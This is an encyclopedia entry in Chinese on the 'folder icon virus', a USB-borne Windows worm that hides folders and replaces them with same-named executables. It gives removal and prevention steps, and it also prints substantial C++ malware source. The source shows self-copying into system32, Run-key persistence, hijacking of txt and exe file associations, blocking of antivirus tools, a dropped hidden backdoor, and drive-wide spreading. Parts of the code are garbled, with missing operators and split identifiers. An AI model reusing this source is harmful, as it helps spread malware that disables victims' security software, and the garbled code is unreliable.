複製鏈接
請複製以下鏈接發送給好友
https://baike.baidu.hk/item/文件夾圖標病毒/8611078
複製
複製成功

文件夾圖標病毒

鎖定
文件夾圖標病毒不是一個病毒,而是具有類似性質的病毒的統稱,此類病毒會將真正的文件夾隱藏起來,並生成一個與文件夾同名的EXE文件,並使用文件夾的圖標,使用户無法分辨,從而頻繁感染,一些用户的文件夾被隱藏影響正常的工作與學習。
中文名
文件夾圖標病毒
定    義
類似性質的病毒的統稱
作    用
會將真正的文件夾隱藏起來
危    害
影響正常的工作與學習

目錄

  1. 1 病毒由來
  2. 2 病毒源代碼
  1. 3 查殺方式
  2. 4 病毒危害
  1. 5 病毒防範
  2. 6 手工防毒法

文件夾圖標病毒病毒由來

文件夾圖標病毒具有Autorun屬性。該病毒是用VC編寫,運行後會在系統目錄下生成類似XP-8B618895.EXE的病毒副本,其中8B618895是隨機的,並搜索移動設備,生成autorun文件,並根據移動存儲設備根目錄文件夾名生成同名EXE文件,並將原文件夾隱藏起來。另外病毒還會刪除臨時文件及Cookies,刪除IE訪問記錄TypedURL。
生成文件(以系統盤為C盤,winxp Sp3為例,U:\代表U盤盤符)
C:\WINDOWS\system32\XP-8B618895.EXE 1,501,856
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\「開始」菜單\程序\啓動\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格)
U:\autorun.inf
U:\Recycled.exe
在U盤根目錄生成文件夾圖標同名EXE文件
以下是易語言的庫文件等:
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
添加註冊表啓動項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895(這裏也是隨機的,根據病毒名生成的不同而變)

文件夾圖標病毒病毒源代碼

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,"\\");
}
//此處只在系統根目錄下有效
sprintf(HiJack,"%s%s\\",DirUrl,AfxGetApp()->m_pszAp pName);
//判斷是否存在。
可以打開
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,"explorer.exe %s",HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持"txt、exe"文件,並屏蔽常用安全工具
//定義特徵字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={"USBCleaner",
"Kis",
"Kav",
"IceSword",
"Kill",
"WSYSCHECK",
"360"};
//獲取參數並判斷
if(strcmp(m_lpCmdLine,""))//如果有參數
{
//判斷特徵字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strdup(m_lpCmdLine)),
_strupr(_strdup(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(".")) 1;
CString cmd;
// if(!wcscmp(ext,_T("txt")))
if(strstr(m_lpCmdLine,_T(".txt"))||strstr(m_lpCmdL ine,_T(".TXT")))
{
cmd.Format("%s %s","notepad.exe",m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(".exe"))||strstr(m_lpCmdL ine,_T(".EXE")))
{
//此處不完美。
判斷文件名
if(!check)
{
// AfxMessageBox("文件已損壞!");
::MessageBox(NULL,"文件已損壞!請重新安裝應用程序!","Microsoft",MB_OK);
return FALSE;
}
else
cmd.Format("%s",m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打開文件
OpenFuckFile();
3、自啓動及實現劫持"exe、txt"文件
//向系統目錄下拷貝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
CloseHandle(hModule);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,"\\SysKernel.exe");
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//寫註冊表。
弄個自啓動
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysKernel",REG_SZ,FileNew,0,0);
//寫註冊表,進行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,"%s %%1",FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ txtfile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ exefile\\shell\\open\\command",
NULL,REG_SZ,Hijack,0,1);
4、釋放後門,並啓動之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, "\\SysService.exe");
ReleaseResource(IDR_BIN, "BIN", strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//實現後門自啓動
WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
"SysService",REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍歷磁盤並拷貝自身
//遍歷系統磁盤
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//實際存儲驅動器號的字符串長度
LPSTR lp;
CString strLogdrive;
//獲得實際存儲驅動器號的字符串長度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不為空。
則表示有正常的驅動器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//幹壞事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T("*.*");
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule;
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
// CloseHandle(hModule);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe" );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

文件夾圖標病毒查殺方式

1.下載usbcleaner,並運行其中的foldercure.exe
2.下載usbcleaner單獨的文件夾圖標病毒專殺工具,下
3.手動查殺:
結束進程
XP-8B618895.EXE(注意名稱不固定,最好用icesword,其圖標是文件夾容易區分)
依次刪除
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\「開始」菜單\程序\啓動\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格)
C:\WINDOWS\system32\og.EDT&一個VB程序那種圖標的exe(名字記不清了,總之看修改日期就好幾乎與其他可疑文件是同一時期而且這幾個文件都在一塊呢)
(以上兩個原文裏雖然沒提但還是也一併刪除吧,再囉嗦一句,當然XP-*.exe這些看見也一概刪除)
(刪除下面幾個是關鍵哦,網上一般解決辦法都沒提)
以下是易語言的庫文件等:
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
刪除病毒啓動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895(此處根據病毒名稱而定)
手動刪除U盤根目錄的文件夾圖標同名EXE文件
-------------------------------

文件夾圖標病毒病毒危害

模仿文件夾的病毒發現至少五種,其行為惡劣程度不等,輕微惡劣的更像是惡作劇程序,最惡劣的一個是連繫統盤各目錄內都模仿全了,總之如果U盤有了文件夾圖標的exe千萬不要點(右鍵也不要!)。刪除的時候務必選擇強制刪除才好。還有除了刪除上述所説的文件外,請務必也將temp文件夾下的易語言庫文件用IceSword強制刪除,我的建議是搜索C盤所有後綴名為fne&fnr的文件然後刪之(殺任何病毒都應有此習慣)。否則雖然system32下的雖刪除了,但如果重啓動作慢的話依然有可能復發哦!

文件夾圖標病毒病毒防範

該病毒的主要傳播方式為U盤傳播,像打印店,大學計算機機房,公司電腦等這些頻繁使用U盤的地方極易感染此病毒。所以我們需要通過一些軟件(比如360衞士)關閉我們電腦的U盤自動播放功能,防止AUTORUN的病發。

文件夾圖標病毒手工防毒法

更改電腦的相關設置:
1.控制面板,文件夾選項,查看
隱藏文件和文件夾
顯示所有隱藏文件和文件夾
2.更改文件夾的查看方式
打開任意文件夾,點查看,選詳細信息.
3.(可選)文件夾選項,查看
隱藏已知文件類型的擴展名,不打鈎.
經過以上設置,在打開文件夾的時候,看"類型",那些文件夾病毒將再無藏身之地.首先,文件類型變成了可執行文件,或者應用程序(後綴名exe),文件大小...如果是真正的文件夾,是不存在"文件大小"的.那裏顯示的是空白,但假的文件夾就是有大小的.
如果顯示了擴展名,那些文件就徹底暴露了,它將顯示為.exe,擺明就是病毒嘛
如果養成了對U盤保持警惕的習慣,這些判斷都只在瞬間完成.沒有習慣的人,吃一塹長一智,總會學聰明的.